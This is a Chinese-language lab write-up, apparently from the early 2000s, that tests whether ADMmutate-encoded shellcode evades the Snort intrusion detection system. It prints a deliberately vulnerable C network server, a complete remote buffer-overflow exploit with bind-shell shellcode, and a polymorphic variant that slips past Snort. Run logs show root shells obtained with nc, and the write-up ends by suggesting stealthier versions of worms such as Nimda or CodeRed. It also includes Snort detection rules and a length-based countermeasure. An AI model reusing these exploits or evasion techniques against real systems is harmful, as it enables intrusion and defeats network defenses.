|
 减小字体
 增大字体
前言:
只是一个试验,用了三台机器,两台机器跑linux (vmware下的RedHat6.2,同事的机子,借用:)一台机器装NIDS(snort1.8-WIN32)
其中:
server IP: 192.168.100.170
client IP: 192.168.100.171
NIDS IP: 192.168.100.172
目的:
想试试利用ADMmutate是否可以逃过NIDS的监视进行远程缓冲区溢出?NIDS是否可以通过配 置来发现这种攻击!
ADMmutate的介绍:
这个程序的作者是k2,利用了名为多形态代码的技术,使攻击者能够潜在的改变代码结构来欺骗许 多入侵检测系统,但它不会破坏最初的攻击性程序。溢出程序经它一改,就可以摇身一变,而且由于采用了动态改变的技术,每次伪装的shellcode都不相同,本来ids依靠提取公开的溢出程序的特征码来检测报警,特征码变了后ids就检测不到了。
伪装前的shellcode格式为:
[NNNNNNNNNNNNN][SSSS][RRRR]
伪装后的shellcode格式为:
[nnnnnnn][dddd][ssss][rrrr]
其中:
N表示NOP,S表示shellcode,R表示返回地址;
n表示经过编码的NOP,d为解码器,s表示经过编码的shellcode,r表示返回地址。
(ADMmutate在k2的主页上有下载:
http://www.ktwo.ca/c/ADMmutate-0.7.3.tar.gz)
测试过程:
(下面的程序涉及到远程缓冲区溢出,如不明白请看《高级缓冲区溢出下》或《怎样写远程缓冲区溢出漏洞利用程序 》)
1.服务器端运行有漏洞的服务器程序(vulnerable)
//-------------有漏洞的服务器程序(vulnerable.c)-------------------
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define BUFFER_SIZE 1024
#define NAME_SIZE 2048
int handling(int c)
{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "My name is: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1]= '0';
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;
}
int main(int argc, char *argv[])
{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, &cli, &cli_size);
if (c == -1)
{
perror("accept() failed");
return 5;
}
printf("client from %s", inet_ntoa(cli.sin_addr));
if (handling(c) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(c);
}
return 0;
}
-----------------------------------------------------------------------
server:~/ > gcc vulnerable.c -o vulnerable
server:~/ > ./vulnerable 5555&
(现在该程序监听5555端口并等待连接)
2.安装NIDS的机器运行snort:
D:\Tools\Defence\snort>snort -A fast -l log -c shellcode.rules
其中:
shellcode的规则包括:
alert tcp any any -> any any (msg:"SHELLCODE x86 NOP"; content: "|90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; depth: 128; reference:arachnids,181; classtype:bad-unknown; sid:648; rev:2;)
//此规则主要通过对shellcode中的大量NOP进行判断
alert tcp any any -> any any (msg:"SHELLCODE linux shellcode"; content:"/bin/sh";reference:arachnids,343; classtype:attempted-admin; sid:652; rev:2;)
//此规则主要通过对shellcode中的字符串/bin/sh进行判断
alert tcp any any -> any any (msg:"SHELLCODE x86 stealth NOP"; content: "|eb 02 eb 02 eb 02|"; reference:arachnids,291; classtype:bad-unknown; sid:651; rev:2;)
//此规则主要通过对shellcode中的用来替换NOP的jmp 0x02(十六进制为eb 02)进行判断。采用eb 02替换NOP只要是为了躲避一些通过NOP来判断是否溢出的NIDS的检测。
3.客户端运行正常的远程缓冲区溢出程序exploit
//----------------- 正常的exploit.c ----------------------------------
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define SIZE 2048
#define NOPDEF 861
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
(一个将shell绑定在3879(\x0f\x27\)端口的shellcode!)
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char buffer[SIZE];
int s, i, size, offset;
unsigned long addr;
struct sockaddr_in remote;
struct hostent *host;
int nop=NOPDEF;
if(argc != 4) {
printf("Usage: %s target-ip port offset\n", argv[0]);
return -1;
}
offset=atoi(argv[3]);
addr=get_sp()-offset;
printf("Jump to 0x%08x\n",addr);
memset(buffer,0x90,SIZE);
memcpy(buffer+nop,shellcode,strlen(shellcode));
for (i = nop+strlen(shellcode); i < SIZE-4; i += 4){
* ((unsigned long *) &buffer[i]) = addr;
}
buffer[2047] = 0x0;
printf("%s\n",buffer);
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL){
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0){
fprintf(stderr, "Error: Socket\n");
return -1;
}
//state Protocolfamily , then converting the hostname or IP address, and gettingport number
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1){
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1){
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
// closing socket
close(s);
}
-------------------------------------------------------------------
client:~/ > gcc exploit.c -o exploit
client:~/> ./exploit 192.168.100.170 5555 200
Jump to 0xbffff220
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悏?也f壭1蓧薈塢鳦
塢鬕塎鼚M敉1蓧E鬋f塢靎荅?塎饙E靿EE鼔袓M敉壭CC蛝壭C蛝壝1刹?壭蛝壭A蛝隵?缊F塃
?
夡崓U
蛝桡/bin/sh
???????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????繍
client:~/># nc 192.168.100.170 3879
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
溢出成功!
检查snort日志结果:
10/13-15:59:09.745690[**] [1:648:2] SHELLCODE x86 NOP [**] [Classification: (null)] [Priority: 0] 192.168.100.171:1222 -> 192.168.100.170:5555
或
10/13-16:02:05.635598[**] [1:652:2] SHELLCODE linux shellcode [**] [Classification: (null)] [Priority: 0] 192.168.100.171:1225 -> 192.168.100.170:5555
(由于检测规则的先后顺序造成的!)
4.客户端运行伪装过的exploitk2
//-------- 伪装过的exploitk2.c ----------------------------------
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include "ADMmutapi.h"
#define SIZE 2048
#define NOPDEF 861
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char buffer[SIZE];
int s, i, size, offset;
unsigned long addr;
struct sockaddr_in remote;
struct hostent *host;
int epad=8; /* a pad of at LEAST 8 is required for this sploit */
int nop=NOPDEF;
struct morphctl *mctlp;
struct morphctl mut;
mut.upper = 0;
mut.lower = 0;
mctlp = &mut;
mut.banned=0;
mut.arch = IA32;
if(argc != 4) {
printf("Usage: %s target-ip port offset\n", argv[0]);
return -1;
}
offset=atoi(argv[3]);
addr=get_sp()-offset;
printf("Jump to 0x%08x\n",addr);
memset(buffer,0x90,SIZE);
memcpy(buffer+nop,shellcode,strlen(shellcode));
for (i = nop+strlen(shellcode); i < SIZE-4; i += 4){
* ((unsigned long *) &buffer[i]) = addr;
}
buffer[2047] = 0x0;
init_mutate(mctlp); //初始化在mut.arch中指定的操作系统结构和功能的指针
if(apply_key(buffer, strlen(shellcode)+epad, nop-1, mctlp) != 0){
exit(1);
} //生成key并用key对shellcode进行编码
if(apply_jnops(buffer, nop-1, mut) != 0){
exit(2);
} //将NOP用其它的垃圾指令替代
if(apply_engine(buffer, strlen(shellcode)+epad, nop-1, mut) != 0){
exit(3);
} //生成解码器
printf("%s\n",buffer);
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL){
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0){
fprintf(stderr, "Error: Socket\n");
return -1;
}
//state Protocolfamily , then converting the hostname or IP address, and getting port number
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1){
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1){
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
// closing socket
close(s);
}
--------------------------------------------------------------------
client:~/ > gccexploitk2.c ADMmuteng.c -o exploitk2
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
?挊?鯓@槜'鶙'7麫掶/掶@鶡/鶚??楡橎橓煉楡麫橖?/鼦/7'7??挊掯燑貔?7楑/??煙貔'鶚?棐鼧@/?'?7/
?@???橓'?/'鯒??鼟橖橓鯍@@@'????鯍掶貂/鴺鶙鴴橒/楖?@貘鼟??@掶/'7''?7鼧??楖?挓貔@7橖貔7魼7'7'煉7'7?
'鵁/'燍@@???鯚@?7??觞@?'?'?棙燍楑?/@7?貔貔/橒?楕?貔掶?????燍鯒@鯚''貂觞?烜貂鶡燉鼧7@?橓鴴
@棐鶚??????鯓燌橓'@鴴'?貔燉棗7?楕7鵃????鼟槜?'挊?7??掯燑?'橓?'鶙?'?槖鶚7@?'//????'?鶔?/楡7鯍?
鶚貂?鵃?'??'??貔鵃麫/魼楖?''鶚?掽@/桜'''鯚燉棙?貂棗'''@楡燌7掯掶?觞橓鯚'?/麫/鯓77'@?鴴7'???鯓7
鴹鯓?'貂/?鼦7槝貂鶡?/橖挓楖鶚//楕掶棢/7?楡煒楑貔'?鶙燉'7貂@/'煑鯒''鼧??'鴴槖7楛鯓?燑鯍
棙??貂??7?????@貘鶡7?燌鵃@?鶙@貘棗?7橎魼鴺@鶚?'@@?@?'?橓'燉''?貂煑?鶙?掵@@'7@楛?'槜?'?'抆凁
4'h??[內4楡1蓛?冟5?棑1搶罇@杻?兤朄杻柒閷桦枧?
=唸?'?wgkwgkg{梗?催fqu壗弛夡鄃{公趂q皙叁?梗?磄娆w#秄洵鹢?&喲?鵱?u#?翱?喏gr榭?^=f莄{绻?"凑
藣]淺b菋b菋b?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉
?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?
繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繍
client:~/> nc 192.168.100.170 3879
id
uid=0(root) gid=0(root) 繉?繉?繉?繉?繉?繉?繉?繉?繍groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
溢出成功!
检查snort日志结果:
NONE :(
可见经过K2的ADMmutate编码的shellcode不能被基于模式匹配的snort发现,难道一点办法也没有了?办法不是没有,但是可能。。。
5.添加一条规则:
alert tcp any any -> any :5555 (msg:"SHELLCODE x86 Length Too Large"; dsize:>1024;)
重新运行:
snort -A fast -l log -c shellcode.rules
然后运行:
./exploitk2 192.168.100.170 5555 300
检查snort日志结果:
10/13-16:09:49.811615[**] [1:0:0] SHELLCODE x86 Length Too Large [**] 192.168.100.171:1228 -> 192.168.100.170:5555
这种根据数据包长度来判断是否存在远程缓冲区溢出攻击的方法,只适合一些特定的端口,如80、53等,而且存在误报的可能。
6.重复多次攻击:
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
煙楖????''烜燑楡//7燍'?7貘777鶡挓楑//?/?7//'?7'?橎''鼰?/'@燉?7/??7??燑/@??鯓@鶚/槝?@??挓?''鼦'@7?'?掶''鶔/橎燉????煉/@'?@掶'掽掶貘貘鼟??/??貘?/燉@魼棗鴴鼟?煉??????燌??//?鶙桜鼟??桜楑'??觞'鯚7楛'7??楑鯍'槜/7??@??鼟??楛煙?橓/掶7掶?楖掵??棐?@鯒?貔7??燌7鯓'鴴楑橓7?@棢槝/?掶鯓@'鶙鯓?楑?@'/?貘鯚?鵃/煉//鴹燑?@?7鵃?觞?烜鴴橒鶙7鴴/貔77掽?'棗/?橒桜?槜鼦'''掽??橎貔7槖/槝燍?鴹/楕7????棗?'?貔@?挊??掵鶔7?扏槦@'@燉鶡鼰楛@'/楖'鼰///?7烜@?鴴?槜''?橓?'鯒??貂拻??7??'?@7''貂?貔鯍?'鯚'?/煑鶚/掯挆?/'?7鯚楖鶡貘鵃''?貔燍7@扏麫橎'?@/貔7?7魼@?7鶚?鴴?/??'?7挊?@7貘?貔????@''挓/鶡??楑鯓鶡@777/?鶡鶙??@7??/?橓鯍貂?'棐@?冭4^囈寥6伙4??缿?1兤冭4朄?屶兤凐7鶘@杻?忏k?腓??
=唸?'?wghwghgx梗?催黤qv壗迟夡鄃x公賔q螵叁?梗?磄瀣w#礷洵鴒?&喲?鵱?u#?凹?啧gr榧?^>f莄x绻?"粗藣]淺b膵b膵b?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉??繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繍
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
7鯓鯓/?鯒槦挊?鶙''掶鶚/7煉?@棐@7?@?鯚棐?橓烜?'鶡??鵁棢??鼟鶚@??貘?'燍?'挓7掶/'?7?鯍@?棐鵁?鼟?楡掵???貂貔煒?橖?'鳣楑'鼧??@'?挊?'/7貂鯚?/挊@?@?麫鴴7?鴹@'楛鴴鴹?@楕/??鯚槖?/貂鴹貔槝燉槜觞7'煉魼?槝?煙7/楡掯'鵁@?'鴺鯚'?@'貂燍???煙燉???@鵁?鼟?'挆?'橎棐7'?鼰???貔@/7掽'/鶙?楖貂7@???棢掵@'7??掯?鵁橎''7?7??'觞?'7?@?/槜@@挊?鶙?鼧7??'貔槦燍@??楛魼??鵁?/掽貘燍?槝?掽7'烜'?'楖燉鶔/'觞?/?鼦''?'鯚挓?鼧7鼧麫魼貂鵃@?/拻/煑?楕@/?棙拻掯掶?橎?/?7鯚楛7?@'槜?'@??鯓'鯒7?貘楑鯓?挊/貂@?鶔貂鶙棗'楑/橎?扏/@?燍楖?'燉貔'?'??桜楖烜/7鵃??@燉棗'/掶??鶔'???/鶡@/?鶙??觞?楛扏?楑?7???煙鵃鶙燌橎挓'鶚?掯掯?燍???麫煑?/煙@?'鼰?7?鶙@'橓'??挆貘'?/桜?^??冟5屶1缿鯓??1朄枟槚@柫?朄杒?朄桏轩忮?霕杵?
=噲?'?vgivgigy福?颠齠pw壖池夠鄃y斧豧p颡绳?福?礸洮v#磃瀛鵲?&囇?鴑?t#?敖?唪gs榻?^?f芻y绺?"底蕗奲艎b?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繉?繍
可见用K2的ADMmutate伪装的shellcode是动态改变的。
结论:
后来又试了一种基于协议分析、命令解释、模式匹配,异常状态统计的新一代的NIDS,存 在同样的问题,应该说经过K2的ADMmutate伪装的shellcode可以逃过使用模式匹配并且利用字符串匹配的大部分NIDS!不过如果NIDS还依靠长度,可打印字符等等综合判断,则ADMmutate还是不能逃脱NIDS的监视,但是依靠长度、可打印字符等判断未必准确,以此判断会造成IDS漏报或误报。如果依靠提取溢出程序的shellcode代码中的解码器的特征码,又因为解码器也不是固定的,并且会有一些无用的垃圾指令填充,因此有很大难度;至于用NOP匹配的办法,也很有难度,因为可以替换NOP的指令有很多,而且长度不同,采用暴力破解的话,会大大增加NIDS的负担,影响其性能;用匹配shellcode的办法更不可行,因为shellcode的key由当前时间产生,每次编码后的shellcode都是唯一的。所以,对于使用模式匹配的NIDS来说,目前仍只能通过长度等简单的判断,对于有一些NIDS,也许可以通过模拟执行的方式检测!
待补充:
可惜没有试试其它的NIDS!遗憾!:(
有关ADMmutate更详细的资料还没整理好!:(
一点想法:
在windows下的溢出应该也可以采用这种办法。如果将whisker和ADMmutate采用的技术结合起来, 或是利用它们的想法,应该可以写出更加隐蔽并且更厉害的攻击程序和蠕虫。如把Nimda或CodeRed改良一下,也许会更隐蔽更难以检测!
参考资料:
ADMmutate-0.7.3的相关资料
怎样写远程缓冲区溢出漏洞利用程序
|
